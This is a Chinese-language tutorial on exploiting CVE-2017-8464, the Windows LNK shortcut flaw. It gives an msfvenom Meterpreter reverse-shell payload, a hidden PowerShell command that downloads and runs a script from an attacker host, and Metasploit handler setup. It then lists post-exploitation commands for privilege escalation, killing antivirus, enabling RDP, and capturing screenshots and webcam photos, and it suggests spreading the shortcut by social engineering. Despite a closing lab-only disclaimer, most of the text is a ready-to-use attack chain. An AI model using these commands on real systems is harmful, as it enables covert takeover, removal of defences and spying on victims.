什么是 CVE-2017-8464 怎么復現(xiàn)
說明:
2017年6月13日,微軟官方發(fā)布編號為CVE-2017-8464的漏洞公告,官方介紹Windows系統(tǒng)在解析快捷方式時存在遠程執(zhí)行任意代碼的高危漏洞,黑客可以通過U盤、網(wǎng)絡共享等途徑觸發(fā)漏洞,完全控制用戶系統(tǒng),安全風險高危
傳播的載體一般是LNK ,LNK是windows系統(tǒng)內(nèi)應用程序快捷方式文件的文件類型后綴名。
危害:
被攻擊機插入存在攻擊lnk的U盤后會反彈shell,哪怕是被隔離的內(nèi)網(wǎng),也可以在不上網(wǎng)的情況下被攻擊。
二、環(huán)境準備:
1 可復現(xiàn)的操作系統(tǒng)版本:
Microsoft Windows 10 Version 1607 for 32-bit Systems
Microsoft Windows 10 Version 1607 for x64-based Systems
Microsoft Windows 10 for 32-bit Systems
Microsoft Windows 10 for x64-based Systems
Microsoft Windows 10 version 1511 for 32-bit Systems
Microsoft Windows 10 version 1511 for x64-based Systems
Microsoft Windows 10 version 1703 for 32-bit Systems
Microsoft Windows 10 version 1703 for x64-based Systems
Microsoft Windows 7 for 32-bit Systems SP1
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 8.1 for 32-bit Systems
Microsoft Windows 8.1 for x64-based Systems
Microsoft Windows RT 8.1
2 可復現(xiàn)的服務器系統(tǒng)版本:
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2012
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2016
3 kali操作系統(tǒng)
三、利用原理 :
創(chuàng)建惡意快捷方式,包含惡意執(zhí)行腳本,點擊惡意快捷方式,導致本機中病毒,并且被遠控。
四、實戰(zhàn)利用
啟動MSF
終端內(nèi)輸入:msfconsole
開始利用:
1、使用MSF創(chuàng)建一個后門
msf內(nèi)輸入:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.3.23 lport=4456 -f psh-reflection>/var/www/html/link.ps1
2、在kali下開啟apache2
終端內(nèi)輸入:service apache2 start
3、通過社會學進行快捷方式傳播
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.204.135/link.ps1');test.ps1"


4 回到MSF終端配置監(jiān)聽
msf內(nèi)輸入: ?use exploit/multi/handler
5 配置payload
set payload windows/x64/meterpreter/reverse_tcp

msf中輸入 : show options ? 配置payload

設置 LHOST ?和 ?LPORT
maf中輸入:
5.1 ?set lhost <當前機器ip>
設置 LHOST
5.2 ?set lport ?<未被占用的端口>
?設置 LPORT

5.3 ?最后在 輸入 show options 查看配置是否生效

6、執(zhí)行監(jiān)聽
msf中輸入 : run 或者 ?exploit

進入靶機執(zhí)行我們在靶機上創(chuàng)建的快捷方式

稍等片刻獲取到meterpreter

五、后滲透
1、通過快捷方式執(zhí)行程序
meterpreter中輸入 ?shell

發(fā)現(xiàn)shell顯示有亂碼
shell內(nèi)輸入 ?chcp 65001

然后進入desktop目錄(這個是win的桌面)
根據(jù)實際情況拼路徑
shell 里輸入:cd users/mb/desktop

2 更多操作
查看進程:ps查看當前進程號:getpid查看系統(tǒng)信息:sysinfo查看目標機是否為虛擬機:run post/windows/gather/checkvm查看完整網(wǎng)絡設置:route查看當前權限:getuid自動提權:getsystem關閉殺毒軟件:run post/windows/manage/killav啟動遠程桌面協(xié)議:run post/windows/manage/enable_rdp列舉當前登錄的用戶:run post/windows/gather/enum_logged_on_users查看當前應用程序:run post/windows/gather/enum_applications抓取目標機的屏幕截圖:load espia ; screengrab抓取攝像頭的照片:webcam_snap查看當前處于目標機的那個目錄:pwd查看當前目錄:getlwd
注意所有操作均在實驗環(huán)境下進行,僅用于教學展示,請勿用于其他渠道 出現(xiàn)任何問題與本up無關!